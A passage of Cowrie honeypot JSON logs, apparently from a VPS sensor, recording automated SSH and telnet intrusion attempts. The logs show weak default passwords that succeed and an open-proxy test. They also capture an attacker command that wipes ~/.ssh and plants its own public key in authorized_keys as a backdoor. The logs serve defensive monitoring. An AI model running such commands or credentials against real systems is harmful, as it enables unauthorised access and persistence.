p521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:21:01.850465Z","src_ip":"212.227.235.229","session":"76da99c9cb99"}
{"eventid":"cowrie.login.success","username":"root","password":"Zaq1xsw2","message":"login attempt [root/Zaq1xsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:21:02.930071Z","src_ip":"212.227.235.229","session":"76da99c9cb99"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:21:03.527596Z","src_ip":"212.227.235.229","session":"76da99c9cb99"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:21:03.528309Z","src_ip":"212.227.235.229","session":"76da99c9cb99"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:21:03.529566Z","src_ip":"212.227.235.229","session":"76da99c9cb99"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:21:03.791058Z","src_ip":"212.227.235.229","session":"76da99c9cb99"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:21:04.329525Z","src_ip":"212.227.235.229","session":"76da99c9cb99"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:21:04.330222Z","src_ip":"212.227.235.229","session":"76da99c9cb99"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:21:04.592599Z","src_ip":"212.227.235.229","session":"76da99c9cb99"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:21:04.593563Z","src_ip":"212.227.235.229","session":"76da99c9cb99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53702,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f8214caa0de","protocol":"ssh","message":"New connection: 212.227.235.229:53702 (1.2.3.4:22) [session: 9f8214caa0de]","sensor":"my-vps","timestamp":"2025-08-26T02:21:04.848891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:21:04.849848Z","src_ip":"212.227.235.229","session":"9f8214caa0de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:21:05.108815Z","src_ip":"212.227.235.229","session":"9f8214caa0de"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:21:06.187576Z","src_ip":"212.227.235.229","session":"9f8214caa0de"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:21:07.448613Z","src_ip":"212.227.235.229","session":"9f8214caa0de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53708,"dst_ip":"1.2.3.4","dst_port":22,"session":"22c2593f32d5","protocol":"ssh","message":"New connection: 212.227.235.229:53708 (1.2.3.4:22) [session: 22c2593f32d5]","sensor":"my-vps","timestamp":"2025-08-26T02:21:07.708095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:21:07.708868Z","src_ip":"212.227.235.229","session":"22c2593f32d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:21:07.967729Z","src_ip":"212.227.235.229","session":"22c2593f32d5"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:21:08.475318Z","src_ip":"139.19.117.131","session":"1f14bc0d839b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:21:09.047851Z","src_ip":"212.227.235.229","session":"22c2593f32d5"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:21:09.309178Z","src_ip":"212.227.235.229","session":"76da99c9cb99"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:21:09.310133Z","src_ip":"212.227.235.229","session":"22c2593f32d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:21:17.355160Z","src_ip":"212.227.235.229","session":"e6a1ab21774f"}
{"eventid":"cowrie.session.closed","duration":180.28865718841553,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:21:17.360525Z","src_ip":"212.227.235.229","session":"e6a1ab21774f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:21:50.327671Z","src_ip":"212.227.125.160","session":"30581f2d0077"}
{"eventid":"cowrie.session.closed","duration":180.11205172538757,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:21:50.331673Z","src_ip":"212.227.125.160","session":"30581f2d0077"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42516,"dst_ip":"1.2.3.4","dst_port":22,"session":"65ad6442f3d0","protocol":"ssh","message":"New connection: 212.227.235.229:42516 (1.2.3.4:22) [session: 65ad6442f3d0]","sensor":"my-vps","timestamp":"2025-08-26T02:22:20.617265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:22:20.618222Z","src_ip":"212.227.235.229","session":"65ad6442f3d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:22:20.878597Z","src_ip":"212.227.235.229","session":"65ad6442f3d0"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive123","message":"login attempt [hive/hive123] failed","sensor":"my-vps","timestamp":"2025-08-26T02:22:21.964855Z","src_ip":"212.227.235.229","session":"65ad6442f3d0"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:22:23.227194Z","src_ip":"212.227.235.229","session":"65ad6442f3d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57630,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d829c52fe0a","protocol":"telnet","message":"New connection: 212.227.125.160:57630 (1.2.3.4:23) [session: 4d829c52fe0a]","sensor":"my-vps","timestamp":"2025-08-26T02:22:41.949746Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43846,"dst_ip":"1.2.3.4","dst_port":23,"session":"ec4b76908e36","protocol":"telnet","message":"New connection: 212.227.235.229:43846 (1.2.3.4:23) [session: ec4b76908e36]","sensor":"my-vps","timestamp":"2025-08-26T02:22:50.860192Z"}
{"eventid":"cowrie.session.closed","duration":12.707185745239258,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:22:54.656863Z","src_ip":"212.227.125.160","session":"4d829c52fe0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42560,"dst_ip":"1.2.3.4","dst_port":23,"session":"306211dd78a3","protocol":"telnet","message":"New connection: 212.227.235.229:42560 (1.2.3.4:23) [session: 306211dd78a3]","sensor":"my-vps","timestamp":"2025-08-26T02:23:17.622519Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:23:17.828614Z","src_ip":"212.227.235.229","session":"306211dd78a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:23:17.849490Z","src_ip":"212.227.235.229","session":"306211dd78a3"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T02:23:17.850795Z","src_ip":"212.227.235.229","session":"306211dd78a3"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T02:23:17.851881Z","src_ip":"212.227.235.229","session":"306211dd78a3"}
{"eventid":"cowrie.session.closed","duration":30.375993967056274,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:23:21.236119Z","src_ip":"212.227.235.229","session":"ec4b76908e36"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60218,"dst_ip":"1.2.3.4","dst_port":22,"session":"558f2350ae89","protocol":"ssh","message":"New connection: 217.72.205.35:60218 (1.2.3.4:22) [session: 558f2350ae89]","sensor":"my-vps","timestamp":"2025-08-26T02:23:26.451367Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:23:26.452508Z","src_ip":"217.72.205.35","session":"558f2350ae89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46156,"dst_ip":"1.2.3.4","dst_port":22,"session":"726fc7478612","protocol":"ssh","message":"New connection: 212.227.235.229:46156 (1.2.3.4:22) [session: 726fc7478612]","sensor":"my-vps","timestamp":"2025-08-26T02:23:37.609724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:23:37.610354Z","src_ip":"212.227.235.229","session":"726fc7478612"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:23:37.891055Z","src_ip":"212.227.235.229","session":"726fc7478612"}
{"eventid":"cowrie.login.failed","username":"proxyuser","password":"123","message":"login attempt [proxyuser/123] failed","sensor":"my-vps","timestamp":"2025-08-26T02:23:39.055754Z","src_ip":"212.227.235.229","session":"726fc7478612"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:23:40.339421Z","src_ip":"212.227.235.229","session":"726fc7478612"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":38002,"dst_ip":"1.2.3.4","dst_port":22,"session":"85e1cf87826d","protocol":"ssh","message":"New connection: 193.105.134.95:38002 (1.2.3.4:22) [session: 85e1cf87826d]","sensor":"my-vps","timestamp":"2025-08-26T02:24:12.892139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PuTTY_Release_0.67","message":"Remote SSH version: SSH-2.0-PuTTY_Release_0.67","sensor":"my-vps","timestamp":"2025-08-26T02:24:12.899586Z","src_ip":"193.105.134.95","session":"85e1cf87826d"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-26T02:24:12.943305Z","src_ip":"193.105.134.95","session":"85e1cf87826d"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:24:13.796244Z","src_ip":"193.105.134.95","session":"85e1cf87826d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":18015,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:18015","sensor":"my-vps","timestamp":"2025-08-26T02:24:13.841520Z","session":"85e1cf87826d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T02:24:13.886858Z","src_ip":"193.105.134.95","session":"85e1cf87826d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":8348,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:8348","sensor":"my-vps","timestamp":"2025-08-26T02:24:14.023079Z","session":"85e1cf87826d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T02:24:14.068089Z","src_ip":"193.105.134.95","session":"85e1cf87826d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"193.105.134.95","src_port":27904,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:27904","sensor":"my-vps","timestamp":"2025-08-26T02:24:14.199054Z","session":"85e1cf87826d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T02:24:14.243934Z","src_ip":"193.105.134.95","session":"85e1cf87826d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"193.105.134.95","src_port":15715,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:15715","sensor":"my-vps","timestamp":"2025-08-26T02:24:14.374931Z","session":"85e1cf87826d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T02:24:14.419672Z","src_ip":"193.105.134.95","session":"85e1cf87826d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"193.105.134.95","src_port":11034,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:11034","sensor":"my-vps","timestamp":"2025-08-26T02:24:14.551319Z","session":"85e1cf87826d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T02:24:14.596919Z","src_ip":"193.105.134.95","session":"85e1cf87826d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a02:6b8:a::a","dst_port":80,"src_ip":"193.105.134.95","src_port":30970,"message":"direct-tcp connection request to 2a02:6b8:a::a:80 from 127.0.0.1:30970","sensor":"my-vps","timestamp":"2025-08-26T02:24:14.727025Z","session":"85e1cf87826d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a02:6b8:a::a","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2a02:6b8:a::a:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T02:24:14.771680Z","src_ip":"193.105.134.95","session":"85e1cf87826d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:24:14.817103Z","src_ip":"193.105.134.95","session":"85e1cf87826d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46074,"dst_ip":"1.2.3.4","dst_port":22,"session":"679690eda867","protocol":"ssh","message":"New connection: 212.227.235.229:46074 (1.2.3.4:22) [session: 679690eda867]","sensor":"my-vps","timestamp":"2025-08-26T02:24:58.224892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:24:58.225811Z","src_ip":"212.227.235.229","session":"679690eda867"}
